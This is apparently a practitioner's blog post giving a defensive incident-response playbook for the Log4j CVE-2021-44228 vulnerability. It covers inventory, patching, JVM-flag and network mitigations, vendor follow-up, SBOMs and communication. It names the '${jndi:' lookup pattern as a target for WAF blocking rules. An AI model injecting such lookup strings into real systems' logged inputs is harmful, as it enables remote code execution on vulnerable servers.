If you’re reading this on December 13, 2021 and you haven’t started your Log4j response, stop reading after this section and go do it. Come back later.
CVE-2021-44228 is a remote code execution vulnerability in Apache Log4j 2. It’s trivially exploitable. An attacker sends a crafted string to anything that gets logged, and your server can execute arbitrary code. No authentication needed. No special access. Just a string in a header, a search field, a username - anything that hits a log statement.
This is the worst vulnerability I’ve seen in a decade of doing this work. Worse than Heartbleed. Worse than Shellshock. The attack surface is enormous because Log4j is everywhere and logging happens everywhere.
What to Do Right Now
I’m helping three teams respond to this simultaneously. Here is the playbook I’m running.
Hour 1: Assign ownership and open a war room.
Name an incident lead. Open a single tracking document – not a Slack thread, not three Jira boards. One document with one owner. This is a security incident, not a normal bug. Treat it accordingly.
Hour 2-4: Inventory.
This is the hardest and most important step. You need to know where Log4j exists in your environment. The problem is that it’s a transitive dependency for hundreds of Java libraries and frameworks. You might not use Log4j directly. Spring Boot pulls it in. Apache Solr bundles it. Elasticsearch includes it. Your vendor’s SaaS product might run it.
Where to look:
- Dependency manifests (
pom.xml,build.gradle,package-lock.jsonfor JVM wrappers) - Build artifacts –
find / -name "log4j*.jar"on your servers, yes, really - Container images – scan them, don’t assume
- Vendor products and SaaS tools you deploy internally
- CI/CD infrastructure itself (Jenkins is Java-based)
Don’t assume “we don’t use Java.” I’ve watched three separate organizations say this and then discover Log4j in their Elasticsearch cluster, their Jenkins server, and a vendor appliance nobody remembered existed.
Hour 4-8: Mitigate the exposed services.
Patch where you can. Log4j 2.16.0 is the fix as of today (2.15.0 had an incomplete fix, update to 2.16.0). For services you can’t patch immediately:
- Set the JVM flag
-Dlog4j2.formatMsgNoLookups=true(works for 2.10+) - Restrict outbound network access from application servers. If your Java service can’t reach the internet, the JNDI lookup fails. This isn’t a fix. It’s a mitigation.
- Add WAF rules to block
${jndi:patterns in request headers and parameters. This is defense in depth, not a solution. Attackers are already finding bypass patterns. - For older versions (below 2.10), remove the
JndiLookupclass from the classpath entirely
Prioritize internet-facing services first. Then internal services that process external input (email, file uploads, webhooks). Then everything else.
Day 2+: Vendor pressure and verification.
Email every vendor that runs Java-based products in your environment. Ask three questions:
- Does your product include Log4j? Which version?
- Is a patch available now? If not, when?
- What mitigations should we apply while waiting?
Some vendors won’t know yet. Track their status and follow up daily.
Why This Is So Bad
Log4j is a logging library. Logging is one of those things every application does, everywhere, all the time. User input gets logged constantly – request parameters, headers, error messages, form fields. The vulnerability turns every log statement that touches user input into a potential RCE.
The JNDI lookup feature that enables the exploit was a feature, not a bug. It was designed to let log messages pull dynamic content from remote sources. Nobody anticipated that this would become a trivially exploitable code execution path. But here we are.
The blast radius isn’t just your code. It’s every dependency that uses Log4j. It’s every vendor product. It’s every internal tool. Exploitation is happening in the wild right now and automated scanning is widespread.
The Inventory Problem Is the Real Problem
The technical fix is straightforward: update Log4j. The hard part is knowing where Log4j lives.
Most organizations can’t answer “what software do we run and what are its dependencies” quickly. This has been a known gap for years and it bites hardest during events exactly like this one.
If you come out of this incident without building a software bill of materials (SBOM) practice, you’ll have the same problem next time. And there will be a next time.
What an SBOM practice looks like:
- Generate dependency manifests as part of your build pipeline
- Store them in a searchable registry
- Include transitive dependencies, not just direct ones
- Cover vendor products and container base images
- Be able to answer “which services use library X at version Y” in minutes, not days
Communication: Don’t Go Silent
I’ve seen organizations go quiet externally during this response because they’re “still assessing.” That’s the wrong call. Customers and partners are asking. Silence reads as “they don’t know” or worse “they don’t care.”
Send updates on a fixed cadence. Every 12 hours minimum. Even if the update is “we’re still inventorying and have mitigated N of M known-affected services.” Structured communication builds trust. Silence destroys it.
Keep an internal status page with every service listed and its status: unknown, investigating, affected, mitigated, patched. Update it as you go. “Unknown” is a valid status – better than pretending you have checked things you haven’t.
After the Fire
When the acute response is over (and it will take weeks, not days), don’t just move on. Some things that need to happen:
- Remove temporary mitigations and verify patches are applied end-to-end
- Audit your response: how long did it take to produce a credible inventory? What did you miss? Where were the gaps?
- Build the SBOM practice you should have had before this happened
- Review your vendor management process – did you know which vendors to contact?
- Update your incident response playbook with what you learned
This vulnerability is a stress test for your entire security posture. How you respond to it says more about your organization’s operational maturity than any compliance audit ever will.
Patch your systems. Inventory your dependencies. Communicate clearly. And when the dust settles, invest in the visibility that would have made this response faster.